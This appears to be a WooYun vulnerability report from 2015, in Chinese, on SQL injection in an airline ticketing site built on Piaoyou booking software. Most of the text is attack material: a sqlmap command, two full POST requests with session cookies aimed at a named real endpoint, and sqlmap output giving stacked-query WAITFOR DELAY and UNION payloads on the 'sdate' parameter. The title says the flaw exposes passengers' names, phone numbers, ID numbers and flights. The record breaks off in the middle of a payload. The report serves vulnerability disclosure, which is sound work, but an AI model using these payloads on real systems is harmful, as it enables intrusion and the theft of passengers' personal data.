海华航空存在两处SQL注入泄露大量订单信息（姓名、手机、证件号、航班号和起飞时间等）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0120629

漏洞标题：海华航空存在两处SQL注入泄露大量订单信息（姓名、手机、证件号、航班号和起飞时间等）

漏洞作者： missy

提交时间：2015-06-15 15:25

修复时间：2015-09-17 17:20

公开时间：2015-09-17 17:20

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-06-15：细节已通知厂商并且等待厂商处理中
2015-06-19：厂商已经确认，细节仅向厂商公开
2015-06-22：细节向第三方安全合作伙伴开放
2015-08-13：细节向核心白帽子及相关领域专家公开
2015-08-23：细节向普通白帽子公开
2015-09-02：细节向实习白帽子公开
2015-09-17：细节向公众公开

简要描述：

SQL注入支持UNION

详细说明：

关键字：技术支持:盛代科技-票友软件

http://www.piaoyou.org/case_web.htm 票友软件的case

需要登录，先注册一个账号即可。

sqlmap.py -r 1.txt --time-sec=10 -p sdate

案例一：http://www.h-h.com.cn

POST注入：

POST /Financial/fksq_meb.aspx HTTP/1.1
Host: www.h-h.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.h-h.com.cn/Financial/fksq_meb.aspx
Cookie: ASP.NET_SessionId=j4mez4nqemur1p5awzc5vw1r; tktcookie=memberid=717&truename=qwueiuqwe&level=%e5%85%ac%e5%8f%b8%e5%ae%a2&yhzc=0&gjyhzc=0&yhfs=3&logo=&sh=0&bm=&username=Administrator&shgroup=admin&dbgroup=admin&flag=admin
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 3728
__VIEWSTATE=%2FwEPDwUJODA2NDEzMjQ3D2QWAgIDD2QWBgIBD2QWDAIDDw8WAh4EVGV4dAUJcXd1ZWl1cXdlZGQCBQ8PFgIfAAUMMDEwLTUxNjYyMzU1ZGQCBw8WAh4HVmlzaWJsZWcWAgIBDw8WAh8ABQ1BZG1pbmlzdHJhdG9yZGQCCQ8PFgQeC05hdmlnYXRlVXJsBRR%2BL1N5c3RlbS9teWluZm8uYXNweB8ABQzmiJHnmoTkv6Hmga9kZAILDw8WBB8CBRJ%2BL21lbWJlci9leGl0LmFzcHgfAAUM5a6J5YWo6YCA5Ye6ZGQCDQ8WAh8ABa4PPGxpPjxhIGhyZWY9IiMiPuezu%2Be7n%2BeuoeeQhjwvYT48aSBjbGFzcz0iaWNvMDIiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvU3lzdGVtL215aW5mby5hc3B4Ij7CtyDkvIHkuJrkv6Hmga88L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL21lbWJlci9Hcm91cC5hc3B4Ij7CtyDpg6jpl6jliIbnu4Q8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL21lbWJlci9GbGFnLmFzcHgiPsK3IOinkuiJsuadg%2BmZkDwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL1BlcnNvbm5lbC5hc3B4Ij7CtyDlkZjlt6XnrqHnkIY8L2E%2BPC9saT48L3VsPjwvbGk%2BPGxpPjxhIGhyZWY9IiMiPuW3ruaXhemihOWumjwvYT48aSBjbGFzcz0iaWNvMDMiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvRmxpZ2h0LyI%2Bwrcg5Zu95YaF5py656WoPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9GbGlnaHRfaW50L2dqdGlja2V0cy5hc3B4Ij7CtyDlm73pmYXmnLrnpag8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL0hvdGVsLyI%2Bwrcg5Zu95YaF6YWS5bqXPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9UcmFpbi8iPsK3IOeBq%2Bi9puelqDwvYT48L2xpPjwvdWw%2BPC9saT48bGk%2BPGEgaHJlZj0iIyI%2B6K6i5Y2V5p%2Bl6K%2BiPC9hPjxpIGNsYXNzPSJpY28wNCI%2BPC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI%2BPGxpPjxhIGhyZWY9Ii9PcmRlci9mbGlnaHQuYXNweCI%2Bwrcg6aOe5py656WoPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9PcmRlci9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL09yZGVyL3RyYWluLmFzcHgiPsK3IOeBq%2Bi9puelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvT3JkZXIvUmV0dXJuLmFzcHgiPsK3IOmAgOelqOiusOW9lTwvYT48L2xpPjxsaT48YSBocmVmPSIvT3JkZXIvc2NncV9saXN0LmFzcHgiPsK3IOWNh%2BiIseaUueacn%2BiusOW9lTwvYT48L2xpPjwvdWw%2BPC9saT48bGk%2BPGEgaHJlZj0iIyI%2B6K6i5Y2V5a6h5qC4PC9hPjxpIGNsYXNzPSJpY28wNSI%2BPC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI%2BPGxpPjxhIGhyZWY9Ii9DaGVjay9mbGlnaHQuYXNweCI%2Bwrcg6aOe5py656WoPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9DaGVjay9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL0NoZWNrL3RyYWluLmFzcHgiPsK3IOeBq%2Bi9puelqDwvYT48L2xpPjwvdWw%2BPC9saT48bGk%2BPGEgaHJlZj0iIyI%2B5beu5peF5oql6KGoPC9hPjxpIGNsYXNzPSJpY28wNiI%2BPC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI%2BPGxpPjxhIGhyZWY9Ii9SZXBvcnQvZmxpZ2h0LmFzcHgiPsK3IOmjnuacuuelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L3RyYWluLmFzcHgiPsK3IOeBq%2Bi9puelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L2hvdGVsLmFzcHgiPsK3IOWbveWGhemFkuW6lzwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L3Zpc2EuYXNweCI%2Bwrcg562%2B6K%2BBPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9SZXBvcnQvYnguYXNweCI%2Bwrcg5L%2Bd6ZmpPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9SZXBvcnQvb3RoZXIuYXNweCI%2Bwrcg5YW25a6DPC9hPjwvbGk%2BPC91bD48L2xpPjxsaT48YSBocmVmPSIjIj7otKLliqHnrqHnkIY8L2E%2BPGkgY2xhc3M9ImljbzA3Ij48L2k%2BPHVsIGNsYXNzPSJzdWItbmF2Ij48bGk%2BPGEgaHJlZj0iL0ZpbmFuY2lhbC9ma3NxX21lYi5hc3B4Ij7CtyDku5jmrL7nlLPor7forrDlvZU8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL0ZpbmFuY2lhbC9wYXlfaGlzdG9yeS5hc3B4Ij7CtyDlt7Lku5jmrL7orrDlvZU8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL0ZpbmFuY2lhbC9vcmRlcnNfYWxsLmFzcHgiPsK3IOe7vOWQiOe7n%2BiuoTwvYT48L2xpPjxsaT48YSBocmVmPSIvRmluYW5jaWFsL3hjZF9vcmRlcnMuYXNweCI%2Bwrcg6KGM56iL5Y2V5Lqk5o6lPC9hPjwvbGk%2BPC91bD48L2xpPmQCCw8WAh4LXyFJdGVtQ291bnRmZAIND2QWBgIBDw8WAh8ABV9Db3B5cmlnaHQgJmNvcHk7IDIwMTQgaGhjbC5oLWguY29tLmNuIGFsbCByaWdodHMgcmVzZXJ2ZWQuIOWMl%2BS6rOa1t%2BWNjuiIquepuuacjeWKoeaciemZkOWFrOWPuGRkAgMPDxYCHwAFMeWcsOWdgO%2B8muWMl%2BS6rOW4guS4nOWfjuWMuuWuieW%2Bt%2Bi3r%2BeUsjEw5Y%2B3NS0xMDVkZAIFDw8WAh8ABSvnlLXor53vvJowMTAtNTE2NjIzNTUg5Lyg55yf77yaMDEwLTUxNjY4NDUwZGRk4UujVOiCDJV2KQ5W5yFZ6G%2F3beyhOf%2FbYa5kUT9h2TE%3D&__EVENTVALIDATION=%2FwEWCgK9%2FauVBgLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7AwCmpSpJALSzZWdCeTSLOOzN%2Bp6XI9xcDsnWThoLwdkvHSo1F18f358pUJd&sdate=2015-6-15&edate=2015-6-15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=717

第二处：

POST /Financial/fksq_meb.aspx HTTP/1.1
Host: www.h-h.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.h-h.com.cn/Financial/fksq_meb.aspx
Cookie: ASP.NET_SessionId=j4mez4nqemur1p5awzc5vw1r; tktcookie=memberid=717&truename=qwueiuqwe&level=%e5%85%ac%e5%8f%b8%e5%ae%a2&yhzc=0&gjyhzc=0&yhfs=3&logo=&sh=0&bm=&username=Administrator&shgroup=admin&dbgroup=admin&flag=admin
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 3728
__VIEWSTATE=%2FwEPDwUJODA2NDEzMjQ3D2QWAgIDD2QWBgIBD2QWDAIDDw8WAh4EVGV4dAUJcXd1ZWl1cXdlZGQCBQ8PFgIfAAUMMDEwLTUxNjYyMzU1ZGQCBw8WAh4HVmlzaWJsZWcWAgIBDw8WAh8ABQ1BZG1pbmlzdHJhdG9yZGQCCQ8PFgQeC05hdmlnYXRlVXJsBRR%2BL1N5c3RlbS9teWluZm8uYXNweB8ABQzmiJHnmoTkv6Hmga9kZAILDw8WBB8CBRJ%2BL21lbWJlci9leGl0LmFzcHgfAAUM5a6J5YWo6YCA5Ye6ZGQCDQ8WAh8ABa4PPGxpPjxhIGhyZWY9IiMiPuezu%2Be7n%2BeuoeeQhjwvYT48aSBjbGFzcz0iaWNvMDIiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvU3lzdGVtL215aW5mby5hc3B4Ij7CtyDkvIHkuJrkv6Hmga88L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL21lbWJlci9Hcm91cC5hc3B4Ij7CtyDpg6jpl6jliIbnu4Q8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL21lbWJlci9GbGFnLmFzcHgiPsK3IOinkuiJsuadg%2BmZkDwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL1BlcnNvbm5lbC5hc3B4Ij7CtyDlkZjlt6XnrqHnkIY8L2E%2BPC9saT48L3VsPjwvbGk%2BPGxpPjxhIGhyZWY9IiMiPuW3ruaXhemihOWumjwvYT48aSBjbGFzcz0iaWNvMDMiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvRmxpZ2h0LyI%2Bwrcg5Zu95YaF5py656WoPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9GbGlnaHRfaW50L2dqdGlja2V0cy5hc3B4Ij7CtyDlm73pmYXmnLrnpag8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL0hvdGVsLyI%2Bwrcg5Zu95YaF6YWS5bqXPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9UcmFpbi8iPsK3IOeBq%2Bi9puelqDwvYT48L2xpPjwvdWw%2BPC9saT48bGk%2BPGEgaHJlZj0iIyI%2B6K6i5Y2V5p%2Bl6K%2BiPC9hPjxpIGNsYXNzPSJpY28wNCI%2BPC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI%2BPGxpPjxhIGhyZWY9Ii9PcmRlci9mbGlnaHQuYXNweCI%2Bwrcg6aOe5py656WoPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9PcmRlci9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL09yZGVyL3RyYWluLmFzcHgiPsK3IOeBq%2Bi9puelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvT3JkZXIvUmV0dXJuLmFzcHgiPsK3IOmAgOelqOiusOW9lTwvYT48L2xpPjxsaT48YSBocmVmPSIvT3JkZXIvc2NncV9saXN0LmFzcHgiPsK3IOWNh%2BiIseaUueacn%2BiusOW9lTwvYT48L2xpPjwvdWw%2BPC9saT48bGk%2BPGEgaHJlZj0iIyI%2B6K6i5Y2V5a6h5qC4PC9hPjxpIGNsYXNzPSJpY28wNSI%2BPC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI%2BPGxpPjxhIGhyZWY9Ii9DaGVjay9mbGlnaHQuYXNweCI%2Bwrcg6aOe5py656WoPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9DaGVjay9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL0NoZWNrL3RyYWluLmFzcHgiPsK3IOeBq%2Bi9puelqDwvYT48L2xpPjwvdWw%2BPC9saT48bGk%2BPGEgaHJlZj0iIyI%2B5beu5peF5oql6KGoPC9hPjxpIGNsYXNzPSJpY28wNiI%2BPC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI%2BPGxpPjxhIGhyZWY9Ii9SZXBvcnQvZmxpZ2h0LmFzcHgiPsK3IOmjnuacuuelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L3RyYWluLmFzcHgiPsK3IOeBq%2Bi9puelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L2hvdGVsLmFzcHgiPsK3IOWbveWGhemFkuW6lzwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L3Zpc2EuYXNweCI%2Bwrcg562%2B6K%2BBPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9SZXBvcnQvYnguYXNweCI%2Bwrcg5L%2Bd6ZmpPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9SZXBvcnQvb3RoZXIuYXNweCI%2Bwrcg5YW25a6DPC9hPjwvbGk%2BPC91bD48L2xpPjxsaT48YSBocmVmPSIjIj7otKLliqHnrqHnkIY8L2E%2BPGkgY2xhc3M9ImljbzA3Ij48L2k%2BPHVsIGNsYXNzPSJzdWItbmF2Ij48bGk%2BPGEgaHJlZj0iL0ZpbmFuY2lhbC9ma3NxX21lYi5hc3B4Ij7CtyDku5jmrL7nlLPor7forrDlvZU8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL0ZpbmFuY2lhbC9wYXlfaGlzdG9yeS5hc3B4Ij7CtyDlt7Lku5jmrL7orrDlvZU8L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL0ZpbmFuY2lhbC9vcmRlcnNfYWxsLmFzcHgiPsK3IOe7vOWQiOe7n%2BiuoTwvYT48L2xpPjxsaT48YSBocmVmPSIvRmluYW5jaWFsL3hjZF9vcmRlcnMuYXNweCI%2Bwrcg6KGM56iL5Y2V5Lqk5o6lPC9hPjwvbGk%2BPC91bD48L2xpPmQCCw8WAh4LXyFJdGVtQ291bnRmZAIND2QWBgIBDw8WAh8ABV9Db3B5cmlnaHQgJmNvcHk7IDIwMTQgaGhjbC5oLWguY29tLmNuIGFsbCByaWdodHMgcmVzZXJ2ZWQuIOWMl%2BS6rOa1t%2BWNjuiIquepuuacjeWKoeaciemZkOWFrOWPuGRkAgMPDxYCHwAFMeWcsOWdgO%2B8muWMl%2BS6rOW4guS4nOWfjuWMuuWuieW%2Bt%2Bi3r%2BeUsjEw5Y%2B3NS0xMDVkZAIFDw8WAh8ABSvnlLXor53vvJowMTAtNTE2NjIzNTUg5Lyg55yf77yaMDEwLTUxNjY4NDUwZGRk4UujVOiCDJV2KQ5W5yFZ6G%2F3beyhOf%2FbYa5kUT9h2TE%3D&__EVENTVALIDATION=%2FwEWCgK9%2FauVBgLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7AwCmpSpJALSzZWdCeTSLOOzN%2Bp6XI9xcDsnWThoLwdkvHSo1F18f358pUJd&sdate=2015-6-15&edate=2015-6-15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=717

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: sdate (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: __VIEWSTATE=/wEPDwUJODA2NDEzMjQ3D2QWAgIDD2QWBgIBD2QWDAIDDw8WAh4EVGV4dAUJcXd1ZWl1cXdlZGQCBQ8PFgIfAAUMMDEwLTUxNjYyMzU1ZGQCBw8WAh4HVmlzaWJsZWcWAgIBDw8WAh8ABQ1BZG1pbmlzdHJhdG9yZGQCCQ8PFgQeC05hdmlnYXRlVXJsBRR+L1N5c3RlbS9teWluZm8uYXNweB8ABQzmiJHnmoTkv6Hmga9kZAILDw8WBB8CBRJ+L21lbWJlci9leGl0LmFzcHgfAAUM5a6J5YWo6YCA5Ye6ZGQCDQ8WAh8ABa4PPGxpPjxhIGhyZWY9IiMiPuezu+e7n+euoeeQhjwvYT48aSBjbGFzcz0iaWNvMDIiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvU3lzdGVtL215aW5mby5hc3B4Ij7CtyDkvIHkuJrkv6Hmga88L2E+PC9saT48bGk+PGEgaHJlZj0iL21lbWJlci9Hcm91cC5hc3B4Ij7CtyDpg6jpl6jliIbnu4Q8L2E+PC9saT48bGk+PGEgaHJlZj0iL21lbWJlci9GbGFnLmFzcHgiPsK3IOinkuiJsuadg+mZkDwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL1BlcnNvbm5lbC5hc3B4Ij7CtyDlkZjlt6XnrqHnkIY8L2E+PC9saT48L3VsPjwvbGk+PGxpPjxhIGhyZWY9IiMiPuW3ruaXhemihOWumjwvYT48aSBjbGFzcz0iaWNvMDMiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvRmxpZ2h0LyI+wrcg5Zu95YaF5py656WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9GbGlnaHRfaW50L2dqdGlja2V0cy5hc3B4Ij7CtyDlm73pmYXmnLrnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL0hvdGVsLyI+wrcg5Zu95YaF6YWS5bqXPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9UcmFpbi8iPsK3IOeBq+i9puelqDwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+6K6i5Y2V5p+l6K+iPC9hPjxpIGNsYXNzPSJpY28wNCI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9PcmRlci9mbGlnaHQuYXNweCI+wrcg6aOe5py656WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9PcmRlci9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E+PC9saT48bGk+PGEgaHJlZj0iL09yZGVyL3RyYWluLmFzcHgiPsK3IOeBq+i9puelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvT3JkZXIvUmV0dXJuLmFzcHgiPsK3IOmAgOelqOiusOW9lTwvYT48L2xpPjxsaT48YSBocmVmPSIvT3JkZXIvc2NncV9saXN0LmFzcHgiPsK3IOWNh+iIseaUueacn+iusOW9lTwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+6K6i5Y2V5a6h5qC4PC9hPjxpIGNsYXNzPSJpY28wNSI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9DaGVjay9mbGlnaHQuYXNweCI+wrcg6aOe5py656WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9DaGVjay9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E+PC9saT48bGk+PGEgaHJlZj0iL0NoZWNrL3RyYWluLmFzcHgiPsK3IOeBq+i9puelqDwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+5beu5peF5oql6KGoPC9hPjxpIGNsYXNzPSJpY28wNiI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvZmxpZ2h0LmFzcHgiPsK3IOmjnuacuuelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L3RyYWluLmFzcHgiPsK3IOeBq+i9puelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L2hvdGVsLmFzcHgiPsK3IOWbveWGhemFkuW6lzwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L3Zpc2EuYXNweCI+wrcg562+6K+BPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvYnguYXNweCI+wrcg5L+d6ZmpPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvb3RoZXIuYXNweCI+wrcg5YW25a6DPC9hPjwvbGk+PC91bD48L2xpPjxsaT48YSBocmVmPSIjIj7otKLliqHnrqHnkIY8L2E+PGkgY2xhc3M9ImljbzA3Ij48L2k+PHVsIGNsYXNzPSJzdWItbmF2Ij48bGk+PGEgaHJlZj0iL0ZpbmFuY2lhbC9ma3NxX21lYi5hc3B4Ij7CtyDku5jmrL7nlLPor7forrDlvZU8L2E+PC9saT48bGk+PGEgaHJlZj0iL0ZpbmFuY2lhbC9wYXlfaGlzdG9yeS5hc3B4Ij7CtyDlt7Lku5jmrL7orrDlvZU8L2E+PC9saT48bGk+PGEgaHJlZj0iL0ZpbmFuY2lhbC9vcmRlcnNfYWxsLmFzcHgiPsK3IOe7vOWQiOe7n+iuoTwvYT48L2xpPjxsaT48YSBocmVmPSIvRmluYW5jaWFsL3hjZF9vcmRlcnMuYXNweCI+wrcg6KGM56iL5Y2V5Lqk5o6lPC9hPjwvbGk+PC91bD48L2xpPmQCCw8WAh4LXyFJdGVtQ291bnRmZAIND2QWBgIBDw8WAh8ABV9Db3B5cmlnaHQgJmNvcHk7IDIwMTQgaGhjbC5oLWguY29tLmNuIGFsbCByaWdodHMgcmVzZXJ2ZWQuIOWMl+S6rOa1t+WNjuiIquepuuacjeWKoeaciemZkOWFrOWPuGRkAgMPDxYCHwAFMeWcsOWdgO+8muWMl+S6rOW4guS4nOWfjuWMuuWuieW+t+i3r+eUsjEw5Y+3NS0xMDVkZAIFDw8WAh8ABSvnlLXor53vvJowMTAtNTE2NjIzNTUg5Lyg55yf77yaMDEwLTUxNjY4NDUwZGRk4UujVOiCDJV2KQ5W5yFZ6G/3beyhOf/bYa5kUT9h2TE=&__EVENTVALIDATION=/wEWCgK9/auVBgLN0o7ECAK7zY7ECALN78rvDALdgOABAsKA4AECu6mvywICjNWu7AwCmpSpJALSzZWdCeTSLOOzN+p6XI9xcDsnWThoLwdkvHSo1F18f358pUJd&sdate=2015-6-15');WAITFOR DELAY '0:0:5'--&edate=2015-6-15&sh=&serarch_but=%E6%9F%A5%E8%AF%A2&kfgp=&skid=0&memberid=717
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: __VIEWSTATE=/wEPDwUJODA2NDEzMjQ3D2QWAgIDD2QWBgIBD2QWDAIDDw8WAh4EVGV4dAUJcXd1ZWl1cXdlZGQCBQ8PFgIfAAUMMDEwLTUxNjYyMzU1ZGQCBw8WAh4HVmlzaWJsZWcWAgIBDw8WAh8ABQ1BZG1pbmlzdHJhdG9yZGQCCQ8PFgQeC05hdmlnYXRlVXJsBRR+L1N5c3RlbS9teWluZm8uYXNweB8ABQzmiJHnmoTkv6Hmga9kZAILDw8WBB8CBRJ+L21lbWJlci9leGl0LmFzcHgfAAUM5a6J5YWo6YCA5Ye6ZGQCDQ8WAh8ABa4PPGxpPjxhIGhyZWY9IiMiPuezu+e7n+euoeeQhjwvYT48aSBjbGFzcz0iaWNvMDIiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvU3lzdGVtL215aW5mby5hc3B4Ij7CtyDkvIHkuJrkv6Hmga88L2E+PC9saT48bGk+PGEgaHJlZj0iL21lbWJlci9Hcm91cC5hc3B4Ij7CtyDpg6jpl6jliIbnu4Q8L2E+PC9saT48bGk+PGEgaHJlZj0iL21lbWJlci9GbGFnLmFzcHgiPsK3IOinkuiJsuadg+mZkDwvYT48L2xpPjxsaT48YSBocmVmPSIvbWVtYmVyL1BlcnNvbm5lbC5hc3B4Ij7CtyDlkZjlt6XnrqHnkIY8L2E+PC9saT48L3VsPjwvbGk+PGxpPjxhIGhyZWY9IiMiPuW3ruaXhemihOWumjwvYT48aSBjbGFzcz0iaWNvMDMiPjwvaT48dWwgY2xhc3M9InN1Yi1uYXYiPjxsaT48YSBocmVmPSIvRmxpZ2h0LyI+wrcg5Zu95YaF5py656WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9GbGlnaHRfaW50L2dqdGlja2V0cy5hc3B4Ij7CtyDlm73pmYXmnLrnpag8L2E+PC9saT48bGk+PGEgaHJlZj0iL0hvdGVsLyI+wrcg5Zu95YaF6YWS5bqXPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9UcmFpbi8iPsK3IOeBq+i9puelqDwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+6K6i5Y2V5p+l6K+iPC9hPjxpIGNsYXNzPSJpY28wNCI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9PcmRlci9mbGlnaHQuYXNweCI+wrcg6aOe5py656WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9PcmRlci9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E+PC9saT48bGk+PGEgaHJlZj0iL09yZGVyL3RyYWluLmFzcHgiPsK3IOeBq+i9puelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvT3JkZXIvUmV0dXJuLmFzcHgiPsK3IOmAgOelqOiusOW9lTwvYT48L2xpPjxsaT48YSBocmVmPSIvT3JkZXIvc2NncV9saXN0LmFzcHgiPsK3IOWNh+iIseaUueacn+iusOW9lTwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+6K6i5Y2V5a6h5qC4PC9hPjxpIGNsYXNzPSJpY28wNSI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9DaGVjay9mbGlnaHQuYXNweCI+wrcg6aOe5py656WoPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9DaGVjay9ob3RlbC5hc3B4Ij7CtyDlm73lhoXphZLlupc8L2E+PC9saT48bGk+PGEgaHJlZj0iL0NoZWNrL3RyYWluLmFzcHgiPsK3IOeBq+i9puelqDwvYT48L2xpPjwvdWw+PC9saT48bGk+PGEgaHJlZj0iIyI+5beu5peF5oql6KGoPC9hPjxpIGNsYXNzPSJpY28wNiI+PC9pPjx1bCBjbGFzcz0ic3ViLW5hdiI+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvZmxpZ2h0LmFzcHgiPsK3IOmjnuacuuelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L3RyYWluLmFzcHgiPsK3IOeBq+i9puelqDwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L2hvdGVsLmFzcHgiPsK3IOWbveWGhemFkuW6lzwvYT48L2xpPjxsaT48YSBocmVmPSIvUmVwb3J0L3Zpc2EuYXNweCI+wrcg562+6K+BPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvYnguYXNweCI+wrcg5L+d6ZmpPC9hPjwvbGk+PGxpPjxhIGhyZWY9Ii9SZXBvcnQvb3RoZXIuYXNweCI+wrcg5YW25a6DPC9hPjwvbGk+PC91bD48L2xpPjxsaT48YSBocmVmPSIjIj7otKLliqHnrqHnkIY8L2E+PGkgY2xhc3M9ImljbzA3Ij48L2k+PHVsIGNsYXNzPSJzdWItbmF2Ij48bGk+PGEgaHJlZj0iL0ZpbmFuY2lhbC9ma3NxX21lYi5hc3B4Ij7CtyDku5jmrL7nlLPor7forrDlvZU8L2E+PC9saT48bGk+PGEgaHJlZj0iL0ZpbmFuY2lhbC9wYXlfaGlzdG9yeS5hc3B4Ij7CtyDlt7Lku5jmrL7orrDlvZU8L2E+PC9saT48bGk+PGEgaHJlZj0iL0ZpbmFuY2lhbC9vcmRlcnNfYWxsLmFzcHgiPsK3IOe7vOWQiOe7n+iuoTwvYT48L2xpPjxsaT48YSBocmVmPSIvRmluYW5jaWFsL3hjZF9vcmRlcnMuYXNweCI+wrcg6KGM56iL5Y2V5Lqk5o6lPC9hPjwvbGk+PC91bD48L2xpPmQCCw8WAh4LXyFJdGVtQ291bnRmZAIND2QWBgIBDw